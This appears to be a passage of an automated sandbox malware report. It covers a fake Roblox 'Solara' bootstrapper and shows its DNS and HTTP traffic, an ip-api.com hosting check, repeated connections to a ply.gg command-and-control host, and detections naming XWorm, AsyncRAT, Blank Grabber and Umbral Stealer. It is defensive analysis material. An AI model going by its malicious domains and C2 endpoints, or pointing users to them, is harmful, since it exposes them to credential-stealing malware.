Nov 14, 2024 20:14:02.078731060 CET | 49700 | 443 | 192.168.2.7 | 104.21.93.27
Nov 14, 2024 20:14:02.078771114 CET | 443 | 49700 | 104.21.93.27 | 192.168.2.7
Nov 14, 2024 20:14:03.602607012 CET | 443 | 49700 | 104.21.93.27 | 192.168.2.7
Nov 14, 2024 20:14:03.602678061 CET | 49700 | 443 | 192.168.2.7 | 104.21.93.27
Nov 14, 2024 20:14:03.605463982 CET | 49700 | 443 | 192.168.2.7 | 104.21.93.27
Nov 14, 2024 20:14:03.605479956 CET | 443 | 49700 | 104.21.93.27 | 192.168.2.7
Nov 14, 2024 20:14:03.605756044 CET | 443 | 49700 | 104.21.93.27 | 192.168.2.7
Nov 14, 2024 20:14:03.652107000 CET | 49700 | 443 | 192.168.2.7 | 104.21.93.27
Nov 14, 2024 20:14:03.699337006 CET | 443 | 49700 | 104.21.93.27 | 192.168.2.7
Nov 14, 2024 20:14:03.895078897 CET | 443 | 49700 | 104.21.93.27 | 192.168.2.7
Nov 14, 2024 20:14:03.895137072 CET | 443 | 49700 | 104.21.93.27 | 192.168.2.7
Nov 14, 2024 20:14:03.895194054 CET | 49700 | 443 | 192.168.2.7 | 104.21.93.27
Nov 14, 2024 20:14:03.910995960 CET | 49700 | 443 | 192.168.2.7 | 104.21.93.27
Nov 14, 2024 20:14:04.501550913 CET | 49702 | 80 | 192.168.2.7 | 208.95.112.1
Nov 14, 2024 20:14:04.506409883 CET | 80 | 49702 | 208.95.112.1 | 192.168.2.7
Nov 14, 2024 20:14:04.506484032 CET | 49702 | 80 | 192.168.2.7 | 208.95.112.1
Nov 14, 2024 20:14:04.506669044 CET | 49702 | 80 | 192.168.2.7 | 208.95.112.1
Nov 14, 2024 20:14:04.511439085 CET | 80 | 49702 | 208.95.112.1 | 192.168.2.7
Nov 14, 2024 20:14:05.101888895 CET | 80 | 49702 | 208.95.112.1 | 192.168.2.7
Nov 14, 2024 20:14:05.123711109 CET | 49702 | 80 | 192.168.2.7 | 208.95.112.1
                                                                                                                                                      Nov 14, 2024 20:14:05.935755968 CET49703443192.168.2.7104.21.93.27
                                                                                                                                                      Nov 14, 2024 20:14:05.935786009 CET44349703104.21.93.27192.168.2.7
                                                                                                                                                      Nov 14, 2024 20:14:05.935854912 CET49703443192.168.2.7104.21.93.27
                                                                                                                                                      Nov 14, 2024 20:14:05.936151028 CET49703443192.168.2.7104.21.93.27
                                                                                                                                                      Nov 14, 2024 20:14:05.936167955 CET44349703104.21.93.27192.168.2.7
                                                                                                                                                      Nov 14, 2024 20:14:06.674789906 CET44349703104.21.93.27192.168.2.7
                                                                                                                                                      Nov 14, 2024 20:14:06.674910069 CET49703443192.168.2.7104.21.93.27
                                                                                                                                                      Nov 14, 2024 20:14:06.676518917 CET49703443192.168.2.7104.21.93.27
                                                                                                                                                      Nov 14, 2024 20:14:06.676532030 CET44349703104.21.93.27192.168.2.7
                                                                                                                                                      Nov 14, 2024 20:14:06.676948071 CET44349703104.21.93.27192.168.2.7
                                                                                                                                                      Nov 14, 2024 20:14:06.678622961 CET49703443192.168.2.7104.21.93.27
                                                                                                                                                      Nov 14, 2024 20:14:06.723329067 CET44349703104.21.93.27192.168.2.7
                                                                                                                                                      Nov 14, 2024 20:14:06.891834021 CET44349703104.21.93.27192.168.2.7
                                                                                                                                                      Nov 14, 2024 20:14:06.892086029 CET44349703104.21.93.27192.168.2.7
                                                                                                                                                      Nov 14, 2024 20:14:06.892211914 CET49703443192.168.2.7104.21.93.27
                                                                                                                                                      Nov 14, 2024 20:14:06.892829895 CET49703443192.168.2.7104.21.93.27
                                                                                                                                                      Nov 14, 2024 20:14:07.082190990 CET49704443192.168.2.7128.116.123.3
                                                                                                                                                      Nov 14, 2024 20:14:07.082251072 CET44349704128.116.123.3192.168.2.7
                                                                                                                                                      Nov 14, 2024 20:14:07.082313061 CET49704443192.168.2.7128.116.123.3
                                                                                                                                                      Nov 14, 2024 20:14:07.082683086 CET49704443192.168.2.7128.116.123.3
                                                                                                                                                      Nov 14, 2024 20:14:07.082704067 CET44349704128.116.123.3192.168.2.7
                                                                                                                                                      Nov 14, 2024 20:14:08.042273045 CET44349704128.116.123.3192.168.2.7
                                                                                                                                                      Nov 14, 2024 20:14:08.045980930 CET49704443192.168.2.7128.116.123.3
                                                                                                                                                      Nov 14, 2024 20:14:08.062125921 CET49704443192.168.2.7128.116.123.3
                                                                                                                                                      Nov 14, 2024 20:14:08.062154055 CET44349704128.116.123.3192.168.2.7
                                                                                                                                                      Nov 14, 2024 20:14:08.062405109 CET44349704128.116.123.3192.168.2.7
                                                                                                                                                      Nov 14, 2024 20:14:08.073858976 CET49704443192.168.2.7128.116.123.3
                                                                                                                                                      Nov 14, 2024 20:14:08.115334988 CET44349704128.116.123.3192.168.2.7
                                                                                                                                                      Nov 14, 2024 20:14:08.573371887 CET44349704128.116.123.3192.168.2.7
                                                                                                                                                      Nov 14, 2024 20:14:08.573446035 CET44349704128.116.123.3192.168.2.7
                                                                                                                                                      Nov 14, 2024 20:14:08.576050043 CET49704443192.168.2.7128.116.123.3
                                                                                                                                                      Nov 14, 2024 20:14:08.576296091 CET49704443192.168.2.7128.116.123.3
                                                                                                                                                      Nov 14, 2024 20:14:10.127506971 CET49706443192.168.2.7104.20.22.46
                                                                                                                                                      Nov 14, 2024 20:14:10.127549887 CET44349706104.20.22.46192.168.2.7
                                                                                                                                                      Nov 14, 2024 20:14:10.127616882 CET49706443192.168.2.7104.20.22.46
                                                                                                                                                      Nov 14, 2024 20:14:10.127923012 CET49706443192.168.2.7104.20.22.46
                                                                                                                                                      Nov 14, 2024 20:14:10.127943993 CET44349706104.20.22.46192.168.2.7
                                                                                                                                                      Nov 14, 2024 20:14:10.953311920 CET44349706104.20.22.46192.168.2.7
                                                                                                                                                      Nov 14, 2024 20:14:10.953387022 CET49706443192.168.2.7104.20.22.46
                                                                                                                                                      Nov 14, 2024 20:14:10.954920053 CET49706443192.168.2.7104.20.22.46
                                                                                                                                                      Nov 14, 2024 20:14:10.954940081 CET44349706104.20.22.46192.168.2.7
                                                                                                                                                      Nov 14, 2024 20:14:10.955178976 CET44349706104.20.22.46192.168.2.7
                                                                                                                                                      Nov 14, 2024 20:14:10.956182003 CET49706443192.168.2.7104.20.22.46
                                                                                                                                                      Nov 14, 2024 20:14:10.999362946 CET44349706104.20.22.46192.168.2.7
                                                                                                                                                      Nov 14, 2024 20:14:11.528934002 CET44349706104.20.22.46192.168.2.7
                                                                                                                                                      Nov 14, 2024 20:14:11.529007912 CET44349706104.20.22.46192.168.2.7
                                                                                                                                                      Nov 14, 2024 20:14:11.529078007 CET49706443192.168.2.7104.20.22.46
                                                                                                                                                      Nov 14, 2024 20:14:11.529678106 CET49706443192.168.2.7104.20.22.46
                                                                                                                                                      Nov 14, 2024 20:15:02.195482016 CET4998926848192.168.2.7147.185.221.23
                                                                                                                                                      Nov 14, 2024 20:15:02.200509071 CET2684849989147.185.221.23192.168.2.7
                                                                                                                                                      Nov 14, 2024 20:15:02.200578928 CET4998926848192.168.2.7147.185.221.23
                                                                                                                                                      Nov 14, 2024 20:15:02.571031094 CET4998926848192.168.2.7147.185.221.23
                                                                                                                                                      Nov 14, 2024 20:15:02.576122999 CET2684849989147.185.221.23192.168.2.7
                                                                                                                                                      Nov 14, 2024 20:15:10.816000938 CET2684849989147.185.221.23192.168.2.7
                                                                                                                                                      Nov 14, 2024 20:15:10.816093922 CET4998926848192.168.2.7147.185.221.23
                                                                                                                                                      Nov 14, 2024 20:15:11.346348047 CET4998926848192.168.2.7147.185.221.23
                                                                                                                                                      Nov 14, 2024 20:15:11.347829103 CET4999126848192.168.2.7147.185.221.23
                                                                                                                                                      Nov 14, 2024 20:15:11.351497889 CET2684849989147.185.221.23192.168.2.7
                                                                                                                                                      Nov 14, 2024 20:15:11.352721930 CET2684849991147.185.221.23192.168.2.7
                                                                                                                                                      Nov 14, 2024 20:15:11.352855921 CET4999126848192.168.2.7147.185.221.23
                                                                                                                                                      Nov 14, 2024 20:15:11.367182016 CET4999126848192.168.2.7147.185.221.23
                                                                                                                                                      Nov 14, 2024 20:15:11.372428894 CET2684849991147.185.221.23192.168.2.7
                                                                                                                                                      Nov 14, 2024 20:15:19.836595058 CET2684849991147.185.221.23192.168.2.7
                                                                                                                                                      Nov 14, 2024 20:15:19.836801052 CET4999126848192.168.2.7147.185.221.23
                                                                                                                                                      Nov 14, 2024 20:15:23.315062046 CET4999126848192.168.2.7147.185.221.23
                                                                                                                                                      Nov 14, 2024 20:15:23.320013046 CET2684849991147.185.221.23192.168.2.7
                                                                                                                                                      Nov 14, 2024 20:15:25.441282988 CET4999326848192.168.2.7147.185.221.23
                                                                                                                                                      Nov 14, 2024 20:15:25.447033882 CET2684849993147.185.221.23192.168.2.7
                                                                                                                                                      Nov 14, 2024 20:15:25.447155952 CET4999326848192.168.2.7147.185.221.23
                                                                                                                                                      Nov 14, 2024 20:15:25.472321987 CET4999326848192.168.2.7147.185.221.23
                                                                                                                                                      Nov 14, 2024 20:15:25.477865934 CET2684849993147.185.221.23192.168.2.7
                                                                                                                                                      Nov 14, 2024 20:15:33.927252054 CET2684849993147.185.221.23192.168.2.7
                                                                                                                                                      Nov 14, 2024 20:15:33.927350998 CET4999326848192.168.2.7147.185.221.23
                                                                                                                                                      Nov 14, 2024 20:15:37.824229002 CET4999326848192.168.2.7147.185.221.23
                                                                                                                                                      Nov 14, 2024 20:15:37.829109907 CET2684849993147.185.221.23192.168.2.7
                                                                                                                                                      Nov 14, 2024 20:15:46.316415071 CET4999826848192.168.2.7147.185.221.23
                                                                                                                                                      Nov 14, 2024 20:15:46.321450949 CET2684849998147.185.221.23192.168.2.7
                                                                                                                                                      Nov 14, 2024 20:15:46.324233055 CET4999826848192.168.2.7147.185.221.23
                                                                                                                                                      Nov 14, 2024 20:15:46.346738100 CET4999826848192.168.2.7147.185.221.23
                                                                                                                                                      Nov 14, 2024 20:15:46.351670980 CET2684849998147.185.221.23192.168.2.7
                                                                                                                                                      Nov 14, 2024 20:15:54.808082104 CET2684849998147.185.221.23192.168.2.7
                                                                                                                                                      Nov 14, 2024 20:15:54.808163881 CET4999826848192.168.2.7147.185.221.23
                                                                                                                                                      Nov 14, 2024 20:15:56.018831015 CET4999826848192.168.2.7147.185.221.23
                                                                                                                                                      Nov 14, 2024 20:15:56.023925066 CET2684849998147.185.221.23192.168.2.7
                                                                                                                                                      Nov 14, 2024 20:15:56.023961067 CET4999926848192.168.2.7147.185.221.23
                                                                                                                                                      Nov 14, 2024 20:15:56.028896093 CET2684849999147.185.221.23192.168.2.7
                                                                                                                                                      Nov 14, 2024 20:15:56.028995037 CET4999926848192.168.2.7147.185.221.23
                                                                                                                                                      Nov 14, 2024 20:15:56.045828104 CET4999926848192.168.2.7147.185.221.23
                                                                                                                                                      Nov 14, 2024 20:15:56.050796032 CET2684849999147.185.221.23192.168.2.7
                                                                                                                                                      Nov 14, 2024 20:16:04.511730909 CET2684849999147.185.221.23192.168.2.7
                                                                                                                                                      Nov 14, 2024 20:16:04.511833906 CET4999926848192.168.2.7147.185.221.23
Timestamp | Source Port | Dest Port | Source IP | Dest IP
Nov 14, 2024 20:14:02.018368959 CET | 60016 | 53 | 192.168.2.7 | 1.1.1.1
Nov 14, 2024 20:14:02.066468000 CET | 53 | 60016 | 1.1.1.1 | 192.168.2.7
Nov 14, 2024 20:14:04.492880106 CET | 53904 | 53 | 192.168.2.7 | 1.1.1.1
Nov 14, 2024 20:14:04.501035929 CET | 53 | 53904 | 1.1.1.1 | 192.168.2.7
Nov 14, 2024 20:14:07.069075108 CET | 54919 | 53 | 192.168.2.7 | 1.1.1.1
Nov 14, 2024 20:14:07.080566883 CET | 53 | 54919 | 1.1.1.1 | 192.168.2.7
Nov 14, 2024 20:14:10.119338989 CET | 61473 | 53 | 192.168.2.7 | 1.1.1.1
Nov 14, 2024 20:14:10.126817942 CET | 53 | 61473 | 1.1.1.1 | 192.168.2.7
Nov 14, 2024 20:15:02.174741030 CET | 64771 | 53 | 192.168.2.7 | 1.1.1.1
Nov 14, 2024 20:15:02.191560984 CET | 53 | 64771 | 1.1.1.1 | 192.168.2.7
Timestamp | Source IP | Dest IP | Trans ID | OP Code | Name | Type | Class | DNS over HTTPS
Nov 14, 2024 20:14:02.018368959 CET | 192.168.2.7 | 1.1.1.1 | 0x64bf | Standard query (0) | getsolara.dev | A (IP address) | IN (0x0001) | false
Nov 14, 2024 20:14:04.492880106 CET | 192.168.2.7 | 1.1.1.1 | 0xec31 | Standard query (0) | ip-api.com | A (IP address) | IN (0x0001) | false
Nov 14, 2024 20:14:07.069075108 CET | 192.168.2.7 | 1.1.1.1 | 0x4274 | Standard query (0) | clientsettings.roblox.com | A (IP address) | IN (0x0001) | false
Nov 14, 2024 20:14:10.119338989 CET | 192.168.2.7 | 1.1.1.1 | 0x8536 | Standard query (0) | www.nodejs.org | A (IP address) | IN (0x0001) | false
Nov 14, 2024 20:15:02.174741030 CET | 192.168.2.7 | 1.1.1.1 | 0xbea6 | Standard query (0) | 23.ip.gl.ply.gg | A (IP address) | IN (0x0001) | false
Timestamp | Source IP | Dest IP | Trans ID | Reply Code | Name | CName | Address | Type | Class | DNS over HTTPS
Nov 14, 2024 20:14:02.066468000 CET | 1.1.1.1 | 192.168.2.7 | 0x64bf | No error (0) | getsolara.dev | | 104.21.93.27 | A (IP address) | IN (0x0001) | false
Nov 14, 2024 20:14:02.066468000 CET | 1.1.1.1 | 192.168.2.7 | 0x64bf | No error (0) | getsolara.dev | | 172.67.203.125 | A (IP address) | IN (0x0001) | false
Nov 14, 2024 20:14:04.501035929 CET | 1.1.1.1 | 192.168.2.7 | 0xec31 | No error (0) | ip-api.com | | 208.95.112.1 | A (IP address) | IN (0x0001) | false
Nov 14, 2024 20:14:07.080566883 CET | 1.1.1.1 | 192.168.2.7 | 0x4274 | No error (0) | clientsettings.roblox.com | titanium.roblox.com | | CNAME (Canonical name) | IN (0x0001) | false
Nov 14, 2024 20:14:07.080566883 CET | 1.1.1.1 | 192.168.2.7 | 0x4274 | No error (0) | titanium.roblox.com | edge-term4.roblox.com | | CNAME (Canonical name) | IN (0x0001) | false
Nov 14, 2024 20:14:07.080566883 CET | 1.1.1.1 | 192.168.2.7 | 0x4274 | No error (0) | edge-term4.roblox.com | edge-term4-fra2.roblox.com | | CNAME (Canonical name) | IN (0x0001) | false
Nov 14, 2024 20:14:07.080566883 CET | 1.1.1.1 | 192.168.2.7 | 0x4274 | No error (0) | edge-term4-fra2.roblox.com | | 128.116.123.3 | A (IP address) | IN (0x0001) | false
Nov 14, 2024 20:14:10.126817942 CET | 1.1.1.1 | 192.168.2.7 | 0x8536 | No error (0) | www.nodejs.org | | 104.20.22.46 | A (IP address) | IN (0x0001) | false
Nov 14, 2024 20:14:10.126817942 CET | 1.1.1.1 | 192.168.2.7 | 0x8536 | No error (0) | www.nodejs.org | | 104.20.23.46 | A (IP address) | IN (0x0001) | false
Nov 14, 2024 20:15:02.191560984 CET | 1.1.1.1 | 192.168.2.7 | 0xbea6 | No error (0) | 23.ip.gl.ply.gg | | 147.185.221.23 | A (IP address) | IN (0x0001) | false
• getsolara.dev
• clientsettings.roblox.com
• www.nodejs.org
• ip-api.com
Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
0 | 192.168.2.7 | 49702 | 208.95.112.1 | 80 | 2404 | C:\Users\user\AppData\Local\Temp\Injector.exe
Timestamp | Bytes transferred | Direction | Data
Nov 14, 2024 20:14:04.506669044 CET | 80 | OUT | GET /line/?fields=hosting HTTP/1.1
Host: ip-api.com
Connection: Keep-Alive
Nov 14, 2024 20:14:05.101888895 CET | 174 | IN | HTTP/1.1 200 OK
Date: Thu, 14 Nov 2024 19:14:04 GMT
Content-Type: text/plain; charset=utf-8
Content-Length: 5
Access-Control-Allow-Origin: *
X-Ttl: 60
X-Rl: 44
Data Raw: 74 72 75 65 0a
Data Ascii: true


Session ID: 0 | Source IP: 192.168.2.7 | Source Port: 49700 | Destination IP: 104.21.93.27 | Destination Port: 443 | PID: 4064 | Process: C:\Users\user\AppData\Local\Temp\BootstrapperV1.23.exe

Timestamp: 2024-11-14 19:14:03 UTC | Bytes transferred: 81 | Direction: OUT | Data:
GET /asset/discord.json HTTP/1.1
Host: getsolara.dev
Connection: Keep-Alive

Timestamp: 2024-11-14 19:14:03 UTC | Bytes transferred: 1018 | Direction: IN | Data:
HTTP/1.1 200 OK
Date: Thu, 14 Nov 2024 19:14:03 GMT
Content-Type: application/json
Transfer-Encoding: chunked
Connection: close
Access-Control-Allow-Origin: *
Cache-Control: public, max-age=0, must-revalidate
ETag: W/"7d966f73b6ce74a610dddaf0d0951ed8"
referrer-policy: strict-origin-when-cross-origin
x-content-type-options: nosniff
Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=VVPj5fKYxfSp%2BZa1NquxPpIV3x5Ozh%2BzH3LNS1RaUxu2aqQA4li3mHqnqr2xDjPQQFLvQ9qvLJJJWjYvXgBjR8qNfaGo4HaQ4%2FirXZbqvy8DniCuJuHqvjmIqk2anK2A"}],"group":"cf-nel","max_age":604800}
NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
Vary: Accept-Encoding
CF-Cache-Status: DYNAMIC
Strict-Transport-Security: max-age=0
Server: cloudflare
CF-RAY: 8e2952855a9f15be-SJC
alt-svc: h3=":443"; ma=86400
server-timing: cfL4;desc="?proto=TCP&rtt=39145&sent=5&recv=6&lost=0&retrans=0&sent_bytes=2812&recv_bytes=695&delivery_rate=73945&cwnd=32&unsent_bytes=0&cid=2d95af225561dcd8&ts=1138&x=0"

Timestamp: 2024-11-14 19:14:03 UTC | Bytes transferred: 109 | Direction: IN | Data:
Data Raw: 36 37 0d 0a 7b 0a 20 20 20 20 22 61 72 67 73 22 20 3a 20 7b 0a 20 20 20 20 20 20 20 22 63 6f 64 65 22 20 3a 20 22 38 50 67 73 70 52 59 41 51 75 22 0a 20 20 20 20 7d 2c 0a 20 20 20 20 22 63 6d 64 22 20 3a 20 22 49 4e 56 49 54 45 5f 42 52 4f 57 53 45 52 22 2c 0a 20 20 20 20 22 6e 6f 6e 63 65 22 20 3a 20 22 2e 22 0a 20 7d 0d 0a
Data Ascii: 67{ "args" : { "code" : "8PgspRYAQu" }, "cmd" : "INVITE_BROWSER", "nonce" : "." }

Timestamp: 2024-11-14 19:14:03 UTC | Bytes transferred: 5 | Direction: IN | Data:
Data Raw: 30 0d 0a 0d 0a
Data Ascii: 0


Session ID: 1 | Source IP: 192.168.2.7 | Source Port: 49703 | Destination IP: 104.21.93.27 | Destination Port: 443 | PID: 4064 | Process: C:\Users\user\AppData\Local\Temp\BootstrapperV1.23.exe

Timestamp: 2024-11-14 19:14:06 UTC | Bytes transferred: 56 | Direction: OUT | Data:
GET /api/endpoint.json HTTP/1.1
Host: getsolara.dev

Timestamp: 2024-11-14 19:14:06 UTC | Bytes transferred: 1015 | Direction: IN | Data:
HTTP/1.1 200 OK
Date: Thu, 14 Nov 2024 19:14:06 GMT
Content-Type: application/json
Transfer-Encoding: chunked
Connection: close
Access-Control-Allow-Origin: *
Cache-Control: public, max-age=0, must-revalidate
ETag: W/"f6b52a565df2f13c59cdfa7bdef89298"
referrer-policy: strict-origin-when-cross-origin
x-content-type-options: nosniff
Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=%2Bq0wmpm0fsmW8YhHyXFigk3QThwGIUIK8OhyWjGx4YxgVcCF5bVe%2BSvRqZa3qWw8WISASDHeDaZERsWbcVc2mSp54GkNhhWuguOtVIsCFz9dBkMk3OFrOFFGI3GCgO9T"}],"group":"cf-nel","max_age":604800}
NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
Vary: Accept-Encoding
cf-cache-status: DYNAMIC
Strict-Transport-Security: max-age=0
Server: cloudflare
CF-RAY: 8e2952983ddf2510-SJC
alt-svc: h3=":443"; ma=86400
server-timing: cfL4;desc="?proto=TCP&rtt=44833&sent=4&recv=6&lost=0&retrans=0&sent_bytes=2812&recv_bytes=694&delivery_rate=64567&cwnd=32&unsent_bytes=0&cid=6871c0110a50a616&ts=259&x=0"

Timestamp: 2024-11-14 19:14:06 UTC | Bytes transferred: 354 | Direction: IN | Data:
Data Raw: 32 31 63 0d 0a 7b 0a 20 20 20 20 22 42 6f 6f 74 73 74 72 61 70 70 65 72 56 65 72 73 69 6f 6e 22 3a 20 22 31 2e 32 33 22 2c 0a 20 20 20 20 22 53 75 70 70 6f 72 74 65 64 43 6c 69 65 6e 74 22 3a 20 22 76 65 72 73 69 6f 6e 2d 33 32 66 33 36 61 63 39 34 34 62 33 34 39 31 33 22 2c 0a 20 20 20 20 22 53 6f 66 74 77 61 72 65 56 65 72 73 69 6f 6e 22 3a 20 22 33 2e 31 32 38 22 2c 0a 20 20 20 20 22 42 6f 6f 74 73 74 72 61 70 70 65 72 55 72 6c 22 3a 20 22 68 74 74 70 73 3a 2f 2f 34 64 33 38 61 31 65 63 2e 73 6f 6c 61 72 61 77 65 62 2d 61 6c 6a 2e 70 61 67 65 73 2e 64 65 76 2f 64 6f 77 6e 6c 6f 61 64 2f 73 74 61 74 69 63 2f 66 69 6c 65 73 2f 42 6f 6f 74 73 74 72 61 70 70 65 72 2e 65 78 65 22 2c 0a 20 20 20 20 22 53 6f 66 74 77 61 72 65 55 72 6c 22 3a 22 68 74 74 70 73
Data Ascii: 21c{ "BootstrapperVersion": "1.23", "SupportedClient": "version-32f36ac944b34913", "SoftwareVersion": "3.128", "BootstrapperUrl": "https://4d38a1ec.solaraweb-alj.pages.dev/download/static/files/Bootstrapper.exe", "SoftwareUrl":"https

Timestamp: 2024-11-14 19:14:06 UTC | Bytes transferred: 193 | Direction: IN | Data:
Data Raw: 2f 2f 63 6c 69 65 6e 74 73 65 74 74 69 6e 67 73 2e 72 6f 62 6c 6f 78 2e 63 6f 6d 2f 76 32 2f 63 6c 69 65 6e 74 2d 76 65 72 73 69 6f 6e 2f 57 69 6e 64 6f 77 73 50 6c 61 79 65 72 2f 63 68 61 6e 6e 65 6c 2f 6c 69 76 65 22 2c 0a 20 20 20 20 22 43 6c 69 65 6e 74 48 61 73 68 22 3a 22 34 66 33 61 34 65 65 34 66 65 30 63 37 63 37 36 61 30 65 36 39 34 30 36 36 61 35 64 33 62 33 61 36 37 37 66 31 32 35 39 65 35 62 33 33 30 35 32 66 65 66 35 36 37 37 39 66 36 36 34 35 32 34 32 22 2c 0a 20 20 20 20 22 43 68 61 6e 67 65 6c 6f 67 22 3a 22 5b 2b 5d 20 75 70 64 61 74 65 64 22 0a 7d 0d 0a
Data Ascii: //clientsettings.roblox.com/v2/client-version/WindowsPlayer/channel/live", "ClientHash":"4f3a4ee4fe0c7c76a0e694066a5d3b3a677f1259e5b33052fef56779f6645242", "Changelog":"[+] updated"}

Timestamp: 2024-11-14 19:14:06 UTC | Bytes transferred: 5 | Direction: IN | Data:
Data Raw: 30 0d 0a 0d 0a
Data Ascii: 0


Session ID: 2 | Source IP: 192.168.2.7 | Source Port: 49704 | Destination IP: 128.116.123.3 | Destination Port: 443 | PID: 4064 | Process: C:\Users\user\AppData\Local\Temp\BootstrapperV1.23.exe

Timestamp: 2024-11-14 19:14:08 UTC | Bytes transferred: 119 | Direction: OUT | Data:
GET /v2/client-version/WindowsPlayer/channel/live HTTP/1.1
Host: clientsettings.roblox.com
Connection: Keep-Alive

Timestamp: 2024-11-14 19:14:08 UTC | Bytes transferred: 576 | Direction: IN | Data:
HTTP/1.1 200 OK
content-length: 119
content-type: application/json; charset=utf-8
date: Thu, 14 Nov 2024 19:14:07 GMT
server: Kestrel
cache-control: no-cache
strict-transport-security: max-age=3600
x-frame-options: SAMEORIGIN
roblox-machine-id: 579c3809-faaa-6386-93ce-541575ccef5a
x-roblox-region: us-central_rbx
x-roblox-edge: fra2
report-to: {"group":"network-errors","max_age":604800,"endpoints":[{"url":"https://ncs.roblox.com/upload"}]}
nel: {"report_to":"network-errors","max_age":604800,"success_fraction":0.001,"failure_fraction":1}
connection: close

Timestamp: 2024-11-14 19:14:08 UTC | Bytes transferred: 119 | Direction: IN | Data:
Data Raw: 7b 22 76 65 72 73 69 6f 6e 22 3a 22 30 2e 36 35 31 2e 30 2e 36 35 31 30 38 33 33 22 2c 22 63 6c 69 65 6e 74 56 65 72 73 69 6f 6e 55 70 6c 6f 61 64 22 3a 22 76 65 72 73 69 6f 6e 2d 33 32 66 33 36 61 63 39 34 34 62 33 34 39 31 33 22 2c 22 62 6f 6f 74 73 74 72 61 70 70 65 72 56 65 72 73 69 6f 6e 22 3a 22 31 2c 20 36 2c 20 30 2c 20 36 35 31 30 38 33 33 22 7d
Data Ascii: {"version":"0.651.0.6510833","clientVersionUpload":"version-32f36ac944b34913","bootstrapperVersion":"1, 6, 0, 6510833"}


Session ID: 3 | Source IP: 192.168.2.7 | Source Port: 49706 | Destination IP: 104.20.22.46 | Destination Port: 443 | PID: 4064 | Process: C:\Users\user\AppData\Local\Temp\BootstrapperV1.23.exe

Timestamp: 2024-11-14 19:14:10 UTC | Bytes transferred: 99 | Direction: OUT | Data:
GET /dist/v18.16.0/node-v18.16.0-x64.msi HTTP/1.1
Host: www.nodejs.org
Connection: Keep-Alive

Timestamp: 2024-11-14 19:14:11 UTC | Bytes transferred: 497 | Direction: IN | Data:
HTTP/1.1 307 Temporary Redirect
Date: Thu, 14 Nov 2024 19:14:11 GMT
Content-Type: text/plain
Transfer-Encoding: chunked
Connection: close
Cache-Control: public, max-age=0, must-revalidate
location: https://nodejs.org/dist/v18.16.0/node-v18.16.0-x64.msi
strict-transport-security: max-age=31536000; includeSubDomains; preload
x-vercel-id: cle1::p9jb9-1731611651319-944db52af73d
CF-Cache-Status: DYNAMIC
X-Content-Type-Options: nosniff
Server: cloudflare
CF-RAY: 8e2952b2ca6b0bef-DFW

Timestamp: 2024-11-14 19:14:11 UTC | Bytes transferred: 20 | Direction: IN | Data:
Data Raw: 66 0d 0a 52 65 64 69 72 65 63 74 69 6e 67 2e 2e 2e 0a 0d 0a
Data Ascii: fRedirecting...

Timestamp: 2024-11-14 19:14:11 UTC | Bytes transferred: 5 | Direction: IN | Data:
Data Raw: 30 0d 0a 0d 0a
Data Ascii: 0


Target ID: 0
Start time: 14:13:57
Start date: 14/11/2024
Path: C:\Users\user\Desktop\8Hd0ZExgJz.exe
Wow64 process (32bit): false
Commandline: "C:\Users\user\Desktop\8Hd0ZExgJz.exe"
Imagebase: 0x370000
File size: 819'200 bytes
MD5 hash: 7198FA10A50EA9AAF6AE5C2A05AF2104
Has elevated privileges: true
Has administrator privileges: true
Programmed in: C, C++ or other language
Yara matches:
• Rule: JoeSecurity_XWorm, Description: Yara detected XWorm, Source: 00000000.00000002.1259484875.00000000026B1000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
• Rule: MALWARE_Win_AsyncRAT, Description: Detects AsyncRAT, Source: 00000000.00000002.1259484875.00000000026B1000.00000004.00000800.00020000.00000000.sdmp, Author: ditekSHen
Reputation: low
Has exited: true

Target ID: 2
Start time: 14:14:00
Start date: 14/11/2024
Path: C:\Users\user\AppData\Local\Temp\Injector.exe
Wow64 process (32bit): false
Commandline: "C:\Users\user~1\AppData\Local\Temp\Injector.exe"
Imagebase: 0x242bb8d0000
File size: 235'008 bytes
MD5 hash: 3882CFE50E35985982E9EF0C01B99C47
Has elevated privileges: true
Has administrator privileges: true
Programmed in: C, C++ or other language
Yara matches:
• Rule: JoeSecurity_BlankGrabber, Description: Yara detected Blank Grabber, Source: 00000002.00000000.1256332897.00000242BB8D2000.00000002.00000001.01000000.00000006.sdmp, Author: Joe Security
• Rule: JoeSecurity_UmbralStealer, Description: Yara detected Umbral Stealer, Source: 00000002.00000000.1256332897.00000242BB8D2000.00000002.00000001.01000000.00000006.sdmp, Author: Joe Security
• Rule: JoeSecurity_BlankGrabber, Description: Yara detected Blank Grabber, Source: C:\Users\user\AppData\Local\Temp\Injector.exe, Author: Joe Security
• Rule: JoeSecurity_UmbralStealer, Description: Yara detected Umbral Stealer, Source: C:\Users\user\AppData\Local\Temp\Injector.exe, Author: Joe Security
• Rule: INDICATOR_SUSPICIOUS_EXE_WMI_EnumerateVideoDevice, Description: Detects executables attemping to enumerate video devices using WMI, Source: C:\Users\user\AppData\Local\Temp\Injector.exe, Author: ditekSHen
Antivirus matches:
• Detection: 100%, Avira
• Detection: 100%, Joe Sandbox ML
Reputation: low
Has exited: true

                                                                                                                                                      Target ID:3
                                                                                                                                                      Start time:14:14:00
                                                                                                                                                      Start date:14/11/2024
                                                                                                                                                      Path:C:\Users\user\AppData\Local\Temp\Windows Security Host.exe
                                                                                                                                                      Wow64 process (32bit):false
                                                                                                                                                      Commandline:"C:\Users\user~1\AppData\Local\Temp\Windows Security Host.exe"
                                                                                                                                                      Imagebase:0x450000
                                                                                                                                                      File size:81'408 bytes
                                                                                                                                                      MD5 hash:C7BA63CE2ED6D0AAB93AD839E0EDDD68
                                                                                                                                                      Has elevated privileges:true
                                                                                                                                                      Has administrator privileges:true
                                                                                                                                                      Programmed in:C, C++ or other language
                                                                                                                                                      Yara matches:
                                                                                                                                                      • Rule: JoeSecurity_XWorm, Description: Yara detected XWorm, Source: 00000003.00000000.1257101643.0000000000452000.00000002.00000001.01000000.00000007.sdmp, Author: Joe Security
                                                                                                                                                      • Rule: MALWARE_Win_AsyncRAT, Description: Detects AsyncRAT, Source: 00000003.00000000.1257101643.0000000000452000.00000002.00000001.01000000.00000007.sdmp, Author: ditekSHen
